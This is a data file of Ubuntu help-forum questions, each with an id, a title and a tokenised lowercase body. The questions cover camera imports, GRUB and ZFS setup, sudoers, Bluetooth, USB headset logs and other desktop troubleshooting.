171939	can not transfer digital photos from hp photosmart camera	i connected the camera via usb and it was promptly recognized by ubuntu and shotwell , however when attempting to import photos , shotwell can only find a single photo among hundreds . when accessing the camera via nautilus , i can see the folders and all photos there but they are all greyed , not accessible and i am unable to find a way to transfer them . i 've been here and my camera is not present , however some others quite similar are listed . also i 've been at hp support and the drivers for download are available for windows and mac only . i do know that i can transfer the photos on windows using windows photo gallery and i did not need to install additional drivers to do it , so i was expecting ubuntu could do the same . i 'm not sure if it is an issue with shotwell not supporting the camera , missing drivers or something else , because it is a bit strange that it can find a single photo instead of not finding anything at all , which is why i decided to ask this question , despite knowing that there are similar questions ( such as this and this ) about this topic , however all of them report completely unsuccessful transfer attempts is there any way to make shotwell transfer the photos ? if not , any other application that might do it successfully ?
171945	how to force software center to install newest versions ?	i had a question that got closed without directing me to a link that fixes my issue , instead i was just given a link that explains why the software center does not install latest versions . i want to know `` how to force it to always install the newest stable released applications ? ''
171946	installing ubuntu on native zfs root with encryption	i 'm trying to install ubuntu with a native zfs root filesystem on top of an encrypted partition . the device setup is as follows : the physical disk is partitioned into a small boot partition and the rest . the rest of the disk is entirely encrypted and carved up into a /swap and a /root partition for the actual system . the zfs pool created on that root partition with a couple of zfs filesystems for things like /home . these are the two principal guides i 've been following : howto-install-ubuntu-to-a-native-zfs-root-filesystem encryptedfilesystemlvmhowto it 's all working fine except for the final step -- the installation of grub . update-grub says ( inside the chroot ) error : can not find a device for / ( is /dev mounted ? ) /dev is mounted and i followed the additional advice in the second guide for setting up /etc/default/grub and so on . i ca n't seem to get grub to recognise the device and grub.cfg/menu.lst are not being created . are there any steps i might have missed ? all of this is running inside virtualbox if that 's relevant . in particular i 'm wondering what the correct grub command-line would be to boot this system .
171947	ubuntu does not put fedora into grub menu	i have installed a number of operating systems , including fedora . most recently i installed ubuntu , and ubuntu installed its own version of the grub bootloader . however , fedora does not show up on the list of operating systems to boot from . how can i get fedora back in my boot menu ?
171949	two questions : size and files	my questions and concerns are that my windows vista pc is old and so slow , i have been trying to boost its performance but nothing happens , so i decided that i want to switch to ubuntu because the software on vista is not good either and i want to know how much space ubuntu takes up on the pc and i have been playing games on steam in vista and wanted to know if i would have to install it on ubuntu if i were to install it .
171952	gthumb 3.0.1 - how to view , empty trash ?	when i am browsing images with gthumb 3.0.1 , hitting the delete key removes the file from the browser ( i assume by placing it into a gthumb trash ) , but it remains on disk . and there appears to be no way to either view the gthumb trash nor empty it . how does one view and/or empty the trash - removing the files from the disk - in gthumb ?
171954	showing `` boot : '' trying to install ubuntu from usb stick created with pendrive	i am trying to install ubuntu on my laptop which is a `` dell inspiron n4010 '' model . i already have windows 7 ultimate and fedora 17 . now i need to install the ubuntu over fedora . so i create ubuntu usb and tried to install . but whenever i 'm selecting `` boot from usb '' option , it enters the command prompt where it shows `` boot : '' and a cursor blinking after that . and i do n't know how to proceed further . since i do n't have any experience on linux , could anybody me help on this ?
171956	sudo : no password for certain command for everybody ( including domain users )	i want to allow the execution of a mount script for everybody . i 'm usually working with a domain user . while allowing the usage of sudo for my user works , i ca n't disable the password prompt for a certain command . my sudoers file is unmodified , except for an additional line at the end : % domain^users all = passwd : all , nopasswd : /usr/local/bin/mount_synology i executed sudo -k to delete cached credentials , then i tried /usr/local/bin/mount_synology but i still get a password prompt . any idea what 's wrong ? also , how would i go about adding multiple allowed commands ?
171959	what happens when i press buy button in software center ?	just for my curiosity , what are processes happening , when i press buy button in software center ? . i just noticed that it updates software cache when i pressed buy button . it means it adds a temporary repository for that app ?
171964	broken laptop monitor and external monitor have the same resolution and ca n't get the external to change	i stupidly slammed the top down on my dell laptop and broke the monitor . i can still see the icons but am unable to adjust the resolution to make the desktop usable . i attached my external monitor but the same display shows up on that one . i ca n't adjust the resolution on the external either . i 'm hoping that i just broke the monitor and not the computer . is there anyway to check this ?
171973	writing files to an airport extreme using afp	using nautilus i can connect from ubuntu 12.04 ( 64-bit ) to my apple airport extreme using user & password without a problem . i can read , browse folders and delete files . however i can not write files , the file is created , but the contents of the file are not transferred . the transfer fails with the error message `` kfpmiscerr '' which i think means that `` authentication has already been established '' ? . i have tried the command line tools for access using afp but these do not work either . is there a solution to this problem ?
171975	where are the proxy settings saved ?	i 'd like to built a script to switch the proxies between home and work . i know that you can set the wget proxy by using export http_proxy=proxy_address , but that 's not the setting where the gui saves the setting to . chrome for example uses the setting i deployed under system settings - > network - > proxy . where is this information saved ?
171976	what file do i need to install murrine ?	i really really want to make my windows look `` glassy '' in gnome . i am trying to install the murrine engine from here http : //ftp.acc.umu.se/pub/gnome/sources/murrine/0.90/ but i have no idea which file i need ? can somebody please help me ! ? im following these instructions http : //www.unixmen.com/how-to-install-murrine-and-aurora-gtk2-engines-in-ubuntu/ but i have no idea what the engine file should look like ? and also the ./configure command doesnt ex
171977	why do i have two bluetooth services running ?	i do n't know why i 've got what looks like two different bluetooth managers running . from the details , it appears that both blueman and bluez are active . are both of these necessary , or can i remove one of them ? here are the details . running processes : $ pgrep -fl blue 1155 /usr/sbin/bluetoothd 3624 /usr/bin/python /usr/bin/blueman-applet and the packages they apparently derive from : $ dpkg -s blueman-applet blueman : /usr/share/dbus-1/services/blueman-applet.service blueman : /usr/share/man/man1/blueman-applet.1.gz blueman : /usr/bin/blueman-applet $ dpkg -s bluetoothd bluez : /usr/sbin/bluetoothd bluez : /usr/share/man/man8/bluetoothd.8.gz
171978	is it possible to dual-boot with each os on different drives ?	i have an asus ux32vd which has a 500gb hdd and a 32gb ssd . i 'd like to install ubuntu on the ssd keep the pre-installed windows 7 on the hdd . is this possible , and if so , how should i set up my partitions ? i currently have my boot and efi partition on the ssd . ubuntu works fine , but it does n't seem to recognize the windows install .
171979	how can i connect to the internet using usb via gsm modem ?	i want to connect to internet with gsm of my nokia6120 phone and want to do it via cable . how can i do it ?
171981	correct syntax to compare field with awk	first i aplogize for this idiot question . i want to print a field if he is equals to a value . the problem is that i 'm using a non default field sperator and i did n't understand how to make it work . awk ' { fs = `` / '' ; if ( $ 3== '' value '' print $ 3 } ' thanks .
171984	keepassx swaps y and z	i 'm using ubuntu 11.10 with unity and want to use keepassx but the keyboard layout seems to be wrong in this application only . the layout works fine for all other applications . i am using a german keyboard layout . any ideas ?
171985	problem while installing ubuntu with ati radeon 6670 hd	i have recorded what exactly happens with me http : //www.youtube.com/watch ? v=-fa-pjfx-uu p.s , everything worked fine with ati radeon 4670 hd , this issue happened when i changed my vga to 6670 , and i got this issue with any version of ubuntu thanks in advance : )
171989	get track information from internet in 'rhythmbox '	in banshee , i would right-click and obtain track information , including artist and album updates , from the internet . this is explained in this q & a - the lastfm-fingerprint extension : can banshee fix music metadata information ? how do i get so for rhythmbox ?
171990	all my bandwidth eaten up - report included	i have my network bandwidth eaten up totally . whenever i connect my network , without any application being opened it is always full . i have prepared report of iftop , nethogs and network system monitor . iftop and nethogs my host ip is 192.168.1.203 and all the rest are not known though i have tried to pin 192.168.1.105 , it does n't reply . if possible i would like to block the most disturbing ip which is 192.168.1.105 to block it . but do n't know how .
171991	ca n't get minecraft to run on ubuntu	i have installed jdk and jre from this tutorial and have tried many methods of starting it up , yet my results are always the same . if any one could please help me i would be very grateful . exception in thread `` thread-3 '' java.lang.unsatisfiedlinkerror : /home/dennis/.minecraft/bin/natives/liblwjgl.so : /home/dennis/.minecraft/bin/natives/liblwjgl.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( unknown source ) at java.lang.classloader.loadlibrary0 ( unknown source ) at java.lang.classloader.loadlibrary ( unknown source ) at java.lang.runtime.load0 ( unknown source ) at java.lang.system.load ( unknown source ) at org.lwjgl.sys $ 1.run ( sys.java:69 ) at java.security.accesscontroller.doprivileged ( native method ) at org.lwjgl.sys.doloadlibrary ( sys.java:65 ) at org.lwjgl.sys.loadlibrary ( sys.java:81 ) at org.lwjgl.sys. < clinit > ( sys.java:98 ) at net.minecraft.client.minecraft.f ( sourcefile:1853 ) at aoe. < init > ( sourcefile:20 ) at net.minecraft.client.minecraft. < init > ( sourcefile:77 ) at anv. < init > ( sourcefile:36 ) at net.minecraft.client.minecraftapplet.init ( sourcefile:36 ) at net.minecraft.launcher.replace ( launcher.java:136 ) at net.minecraft.launcher $ 1.run ( launcher.java:79 )
171993	why does gparted start ntfsresize without asking ?	i just started gparted while one of my external hard drives is connected to my computer . scanning for partitions as usual gparted starts hanging at /dev/sdg and i can hear that there is a lot of disk activity on my external hard disk . this has been going on for a while now and i checked the process list , gparted started ntfsresize on my partition ! ~ > ps ax | grep ntfsresize 701 pts/2 s+ 0:00 grep ntfsresize 32758 pts/0 s+ 0:00 sh -c ntfsresize -- info -- force -- no-progress-bar /dev/sdg1 32759 pts/0 d+ 0:04 ntfsresize -- info -- force -- no-progress-bar /dev/sdg1 why is it doing that without asking me first ? is n't that a potentially very harmful operation ? how long is it going to take ? it is a big partition and just wanted to check something , it already is taking quite some time and i do n't see a way to interrupt the operation without causing a data loss . edit : i found an older thread with a possible solution , but it seems to not apply in this case : http : //crunchbanglinux.org/forums/topic/4059/gpartedntfsresize-issue/ my hard disk partition table : /m/o/opt > sudo fdisk -lu /dev/sdg disk /dev/sdg : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd3a6d496 device boot start end blocks id system /dev/sdg1 63 1953520064 976760001 7 hpfs/ntfs/exfat and comparing what the thread suggest should be written to my hard disk with what already is there : /m/o/opt > echo 63 | awk ' { printf ( `` % c % c % c % c '' , $ 1 % 256 , $ 1/256 , $ 1/65536 , $ 1/16777216 ) } ' | hexdump -c 00000000 3f 00 00 00 | ? ... | 00000004 /m/o/opt > sudo dd bs=1 count=4 skip=28 if=/dev/sdg1 of=ntfs-reference 4+0 records in 4+0 records out 4 bytes ( 4 b ) copied , 0.000196143 s , 20.4 kb/s /m/o/opt > hexdump -c ntfs-reference 00000000 3f 00 00 00 | ? ... | 00000004 so everything is already as suggested in the forum thread i found .
171998	c drive partitoning/ formating simple volume	my c hard drive is a simple volume and will not split . wondering if i can format or change my c drive to a primary partition ( so it will split ) or if i can install ubuntu straight onto my c drive and keep windows 7 .
172002	getting my usb headset to work with chrubuntu kernel	i just want to make an audio call on my brand new ubuntu 12.04 chrubuntu kernel from my chromebox . for that purpose , i am trying to use 2 devices : a logitech headset h555 : http : //www.logitech.com/en-au/webcam-communications/internet-headsets-phones/6810 as that is not working , i also tried a webcam , logitech , not sure about the model , but seems to be this one : http : //mobile.logitech.com/en-us/support/webcams/legacy-devices/3382 the big issue is that it does n't show in my settings - > sound . after some search on internet , i understood that dmesg might help ... the usefull output seems to be these lines : [ 34253.108017 ] ext4-fs ( sda5 ) : could n't mount rdwr because of unsupported optional features ( ff000000 ) [ 35669.588208 ] usb 2-1.5 : usb disconnect , device number 5 [ 35679.288375 ] usb 1-1.5 : usb disconnect , device number 5 [ 35682.803740 ] usb 2-1.5 : new full-speed usb device number 6 using ehci_hcd [ 35682.894724 ] usb 2-1.5 : new usb device found , idvendor=046d , idproduct=0a01 [ 35682.894735 ] usb 2-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 35682.894741 ] usb 2-1.5 : product : logitech usb headset [ 35682.894746 ] usb 2-1.5 : manufacturer : logitech [ 36676.293997 ] init : failed to create pty - disabling logging for job [ 36676.294067 ] init : temporary process spawn error : no such file or directory [ 36744.413838 ] usb 2-1.5 : usb disconnect , device number 6 [ 36784.204411 ] usb 1-1.6 : new full-speed usb device number 21 using ehci_hcd [ 36784.294884 ] usb 1-1.6 : new usb device found , idvendor=046d , idproduct=0a01 [ 36784.294895 ] usb 1-1.6 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 36784.294902 ] usb 1-1.6 : product : logitech usb headset [ 36784.294906 ] usb 1-1.6 : manufacturer : logitech i am still searching a lot of forums and blogs but can not find any answer on what i should do next . any hint ? edit : other info : user @ chrubuntu : ~ $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 6 series/c200 series chipset family thermal management controller ( rev 05 ) 01:00.0 network controller : atheros communications inc. ar9300 wireless lan adaptor ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) user @ chrubuntu : ~ $ cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xe0600000 irq 46 more info : user @ chrubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 046d : c52b logitech , inc. unifying receiver bus 002 device 009 : id 046d:0a01 logitech , inc. usb headset bus 001 device 022 : id 046d:08f5 logitech , inc. quickcam messenger communicate bus 001 device 006 : id 0cf3:3004 atheros communications , inc. edit again : as suggested by john s gruber , here are the lines of /var/log/udev that contains v046d the complete output is here : http : //pastebin.com/fwwceeuu udev [ 2.342758 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 ( usb ) action=add busnum=002 device=/proc/bus/usb/002/003 devname=/dev/bus/usb/002/003 devnum=003 devpath=/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 devtype=usb_device id_bus=usb id_model=logitech_usb_headset id_model_enc=logitech\x20usb\x20headset id_model_id=0a01 id_revision=1013 id_serial=logitech_logitech_usb_headset id_usb_interfaces=:010100:010200 : id_vendor=logitech id_vendor_enc=logitech id_vendor_id=046d major=189 minor=130 product=46d/a01/1013 seqnum=1286 subsystem=usb type=0/0/0 udev_log=3 upower_vendor=logitech , inc. usec_initialized=2342558 and kernel [ 2.180449 ] add /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0 ( usb ) action=add device=/proc/bus/usb/001/005 devpath=/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0 devtype=usb_interface interface=255/255/255 modalias=usb : v046dp08f5d0100dcffdscffdpfficffiscffipff product=46d/8f5/100 seqnum=1282 subsystem=usb type=255/255/255 udev_log=3 and note : these lines only appear for v046dpc52 that seems to be the mouse + keyboard that are actually working fine , i have no line containing v046dp0a01 ( headset ) or v046dp08f5 ( webcam ) udev [ 2.077186 ] add /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.2/0003:046d : c52b.0003/input/input4 ( input ) action=add devpath=/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.2/0003:046d : c52b.0003/input/input4 ev=17 id_bus=usb id_input=1 id_input_mouse=1 id_model=usb_receiver id_model_enc=usb\x20receiver id_model_id=c52b id_path=pci-0000:00:1a.0-usb-0:1.1:1.2 id_path_tag=pci-0000_00_1a_0-usb-0_1_1_1_2 id_revision=1201 id_serial=logitech_usb_receiver id_type=hid id_usb_driver=usbhid id_usb_interfaces=:030101:030102:030000 : id_usb_interface_num=02 id_vendor=logitech id_vendor_enc=logitech id_vendor_id=046d key=ffff0000 0 0 0 0 modalias=input : b0003v046dpc52be0111-e0,1,2,4 , k110,111,112,113,114,115,116,117,118,119,11a,11b,11c,11d,11e,11f , r0,1,6,8 , am4 , lsfw msc=10 name= '' logitech unifying device . wireless pid:101a '' phys= '' usb-0000:00:1a.0-1.1:2 '' product=3/46d/c52b/111 prop=0 rel=143 seqnum=1239 subsystem=input udev_log=3 uniq= '' '' usec_initialized=2067428 re-re-edit : aug 5 21:47:59 chrubuntu kernel : [ 1318.128047 ] usb 2-1.2 : usb disconnect , device number 4 aug 5 21:48:02 chrubuntu kernel : [ 1320.940343 ] usb 2-1.1 : usb disconnect , device number 3 aug 5 21:48:06 chrubuntu kernel : [ 1324.493860 ] usb 2-1.1 : new full-speed usb device number 5 using ehci_hcd aug 5 21:48:06 chrubuntu kernel : [ 1324.580875 ] usb 2-1.1 : new usb device found , idvendor=046d , idproduct=08f5 aug 5 21:48:06 chrubuntu kernel : [ 1324.580885 ] usb 2-1.1 : new usb device strings : mfr=0 , product=1 , serialnumber=0 aug 5 21:48:06 chrubuntu kernel : [ 1324.580891 ] usb 2-1.1 : product : camera aug 5 21:48:06 chrubuntu mtp-probe : checking bus 2 , device 5 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 '' aug 5 21:48:06 chrubuntu mtp-probe : bus : 2 , device : 5 was not an mtp device aug 5 21:48:21 chrubuntu kernel : [ 1339.603896 ] usb 2-1.1 : usb disconnect , device number 5 aug 5 21:48:21 chrubuntu kernel : [ 1339.782120 ] usb 2-1.1 : new full-speed usb device number 6 using ehci_hcd aug 5 21:48:21 chrubuntu kernel : [ 1339.868933 ] usb 2-1.1 : new usb device found , idvendor=046d , idproduct=08f5 aug 5 21:48:21 chrubuntu kernel : [ 1339.868948 ] usb 2-1.1 : new usb device strings : mfr=0 , product=1 , serialnumber=0 aug 5 21:48:21 chrubuntu kernel : [ 1339.868958 ] usb 2-1.1 : product : camera aug 5 21:48:21 chrubuntu mtp-probe : checking bus 2 , device 6 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1 '' aug 5 21:48:21 chrubuntu mtp-probe : bus : 2 , device : 6 was not an mtp device aug 5 21:48:21 chrubuntu kernel : [ 1340.291313 ] usb 2-1.5 : new full-speed usb device number 7 using ehci_hcd aug 5 21:48:22 chrubuntu kernel : [ 1340.382321 ] usb 2-1.5 : new usb device found , idvendor=046d , idproduct=0a01 aug 5 21:48:22 chrubuntu kernel : [ 1340.382332 ] usb 2-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 aug 5 21:48:22 chrubuntu kernel : [ 1340.382338 ] usb 2-1.5 : product : logitech usb headset aug 5 21:48:22 chrubuntu kernel : [ 1340.382343 ] usb 2-1.5 : manufacturer : logitech aug 5 21:48:22 chrubuntu mtp-probe : checking bus 2 , device 7 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5 '' aug 5 21:48:22 chrubuntu mtp-probe : bus : 2 , device : 7 was not an mtp device lsusb -v output ( the terminal is too short to display the first lines : right front ( r ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 13 bdescriptortype 36 bdescriptorsubtype 4 ( mixer_unit ) bunitid 9 bnrinpins 2 basourceid ( 0 ) 12 basourceid ( 1 ) 6 bnrchannels 2 wchannelconfig 0x0003 left front ( l ) right front ( r ) ichannelnames 0 bmcontrols 0x00 imixer 0 audiocontrol interface descriptor : blength 10 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 1 bsourceid 9 bcontrolsize 1 bmacontrols ( 0 ) 0x01 mute control bmacontrols ( 1 ) 0x02 volume control bmacontrols ( 2 ) 0x02 volume control ifeature 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 14 wterminaltype 0x0301 speaker bassocterminal 0 bsourceid 1 iterminal 0 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 2 ( input_terminal ) bterminalid 11 wterminaltype 0x0201 microphone bassocterminal 0 bnrchannels 1 wchannelconfig 0x0001 left front ( l ) ichannelnames 0 iterminal 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 6 ( feature_unit ) bunitid 2 bsourceid 11 bcontrolsize 1 bmacontrols ( 0 ) 0x03 mute control volume control bmacontrols ( 1 ) 0x00 ifeature 0 audiocontrol interface descriptor : blength 12 bdescriptortype 36 bdescriptorsubtype 4 ( mixer_unit ) bunitid 7 bnrinpins 1 basourceid ( 0 ) 2 bnrchannels 1 wchannelconfig 0x0001 left front ( l ) ichannelnames 0 bmcontrols 0x00 imixer 0 audiocontrol interface descriptor : blength 9 bdescriptortype 36 bdescriptorsubtype 3 ( output_terminal ) bterminalid 10 wterminaltype 0x0101 usb streaming bassocterminal 0 bsourceid 7 iterminal 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 1 bnumendpoints 1 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 12 bdelay 1 frames wformattag 1 pcm audiostreaming interface descriptor : blength 23 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 2 bsubframesize 2 bbitresolution 16 bsamfreqtype 5 discrete tsamfreq [ 0 ] 8000 tsamfreq [ 1 ] 11025 tsamfreq [ 2 ] 22050 tsamfreq [ 3 ] 44100 tsamfreq [ 4 ] 48000 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 9 transfer type isochronous synch type adaptive usage type data wmaxpacketsize 0x00c0 1x 192 bytes binterval 1 brefresh 0 bsynchaddress 0 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x01 sampling frequency blockdelayunits 0 undefined wlockdelay 0 undefined interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 2 bnumendpoints 1 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 12 bdelay 1 frames wformattag 1 pcm audiostreaming interface descriptor : blength 23 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 1 bsubframesize 2 bbitresolution 16 bsamfreqtype 5 discrete tsamfreq [ 0 ] 8000 tsamfreq [ 1 ] 11025 tsamfreq [ 2 ] 22050 tsamfreq [ 3 ] 44100 tsamfreq [ 4 ] 48000 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 9 transfer type isochronous synch type adaptive usage type data wmaxpacketsize 0x0060 1x 96 bytes binterval 1 brefresh 0 bsynchaddress 0 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x01 sampling frequency blockdelayunits 0 undefined wlockdelay 0 undefined interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 0 bnumendpoints 0 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 2 balternatesetting 1 bnumendpoints 1 binterfaceclass 1 audio binterfacesubclass 2 streaming binterfaceprotocol 0 iinterface 0 audiostreaming interface descriptor : blength 7 bdescriptortype 36 bdescriptorsubtype 1 ( as_general ) bterminallink 10 bdelay 0 frames wformattag 1 pcm audiostreaming interface descriptor : blength 23 bdescriptortype 36 bdescriptorsubtype 2 ( format_type ) bformattype 1 ( format_type_i ) bnrchannels 1 bsubframesize 2 bbitresolution 16 bsamfreqtype 5 discrete tsamfreq [ 0 ] 8000 tsamfreq [ 1 ] 11025 tsamfreq [ 2 ] 22050 tsamfreq [ 3 ] 44100 tsamfreq [ 4 ] 48000 endpoint descriptor : blength 9 bdescriptortype 5 bendpointaddress 0x84 ep 4 in bmattributes 9 transfer type isochronous synch type adaptive usage type data wmaxpacketsize 0x0060 1x 96 bytes binterval 1 brefresh 0 bsynchaddress 0 audiocontrol endpoint descriptor : blength 7 bdescriptortype 37 bdescriptorsubtype 1 ( ep_general ) bmattributes 0x01 sampling frequency blockdelayunits 2 decoded pcm samples wlockdelay 1 decoded pcm samples edit ( once again.. ) after gksu gedit /etc/modprobe.d/alsa-base.conf change options snd-usb-audio index=-2 to `options snd-usb-audio index=1 then plug in your headset again . i lost the digital output and my headphones became output : user @ chrubuntu : ~ $ modprobe snd-usb-audio fatal : module snd_usb_audio not found . syslog : aug 10 22:51:56 chrubuntu kernel : [ 27.765382 ] usb 2-1.1 : usb disconnect , device number 3 aug 10 22:51:58 chrubuntu kernel : [ 28.964259 ] usb 2-1.5 : new full-speed usb device number 4 using ehci_hcd aug 10 22:51:58 chrubuntu kernel : [ 29.055118 ] usb 2-1.5 : new usb device found , idvendor=046d , idproduct=0a01 aug 10 22:51:58 chrubuntu kernel : [ 29.055128 ] usb 2-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 aug 10 22:51:58 chrubuntu kernel : [ 29.055135 ] usb 2-1.5 : product : logitech usb headset aug 10 22:51:58 chrubuntu kernel : [ 29.055139 ] usb 2-1.5 : manufacturer : logitech aug 10 22:51:58 chrubuntu mtp-probe : checking bus 2 , device 4 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5 '' aug 10 22:51:58 chrubuntu mtp-probe : bus : 2 , device : 4 was not an mtp device cards : 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xe0600000 irq 46 devices : 2 : [ 0- 8 ] : digital audio playback 3 : [ 0- 7 ] : digital audio playback 4 : [ 0- 3 ] : digital audio playback 5 : [ 0- 0 ] : digital audio playback 6 : [ 0- 0 ] : digital audio capture 7 : [ 0- 3 ] : hardware dependent 8 : [ 0- 0 ] : hardware dependent 9 : [ 0 ] : control 33 : : timer user @ chrubuntu : ~ $ uname -a linux chrubuntu 3.2.7 # 1 smp tue jun 26 23:10:36 pdt 2012 x86_64 x86_64 x86_64 gnu/linux bash : /home/user/.bashrc : line 110 : unexpected eof while looking for matching ` '' bash : /home/user/.bashrc : line 114 : syntax error : unexpected end of file user @ chrubuntu : ~ $ locate snd-usb-audio /lib/modules/3.2.0-23-generic/kernel/sound/usb/snd-usb-audio.ko /lib/modules/3.2.0-24-generic/kernel/sound/usb/snd-usb-audio.ko /lib/modules/3.2.0-26-generic/kernel/sound/usb/snd-usb-audio.ko /lib/modules/3.2.0-27-generic/kernel/sound/usb/snd-usb-audio.ko /lib/modules/3.2.0-29-generic/kernel/sound/usb/snd-usb-audio.ko user @ chrubuntu : ~ $ lsmod module size used by fuse 59804 2 snd_hda_codec_hdmi 29062 1 snd_hda_codec_cirrus 20544 1 rfcomm 25259 0 joydev 16448 0 hid_logitech_dj 16448 0 ath3k 12352 0 bluetooth 116787 10 rfcomm , ath3k snd_hda_intel 24640 3 ath9k 117696 0 snd_hda_codec 67292 3 snd_hda_codec_hdmi , snd_hda_codec_cirrus , snd_hda_intel snd_hwdep 12390 1 snd_hda_codec mac80211 198984 1 ath9k ath9k_common 12643 1 ath9k ath9k_hw 363295 2 ath9k , ath9k_common ath 21066 3 ath9k , ath9k_common , ath9k_hw snd_pcm 61378 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec memconsole 12352 0 cfg80211 140766 3 ath9k , mac80211 , ath r8169 45120 0 snd_timer 21094 1 snd_pcm rtc_cmos 16448 0 snd_page_alloc 12757 2 snd_hda_intel , snd_pcm nm10_gpio 12352 0 user @ chrubuntu : ~ $
172003	black screen on boot and have to manually change the brightness	issue : - black screen after boot-up ubuntu version : - 12.04 , 64 bit graphic drivers installation method : - manually purged the old drivers and installed the new drivers provided by amd . tried methods : - added nomodeset option to /etc/default/grub and updated the grub using sudo update-grub and restarted the system . effects : - got the `` system running into low graphics mode '' error with mouse not working . workaround : - re-edited the /etc/default/grub file to remove the nomodeset option and updated the grub again . my graphic card info is as follows : - i want to get rid of the blank screen and i also do n't want to loose my graphic card properties . i just get the black screen and never see the prompt until i press the brightness keys . sir , the driver that i installed has the following properties : - *-rwx -- x -- x 1 root root 106660241 jul 22 02:11 amd-driver-installer-12-6-x86.x86_64.run* i have n't removed the xorg.conf file ; here is the screen shot of the file : -
172007	which key combination would allow me to pass parameters to kernel during boot	i want to pass some parameters like the runlevel , nomodeset to kernel during the booting process . which key combination would allow me to pass the parameters to the kernel , in redhat it used to just an arrow key to get to the kernel options . i had tried pressing and holding the shift key during the boot process to go the kernel options according to other posts but they did n't seem to help . thanks
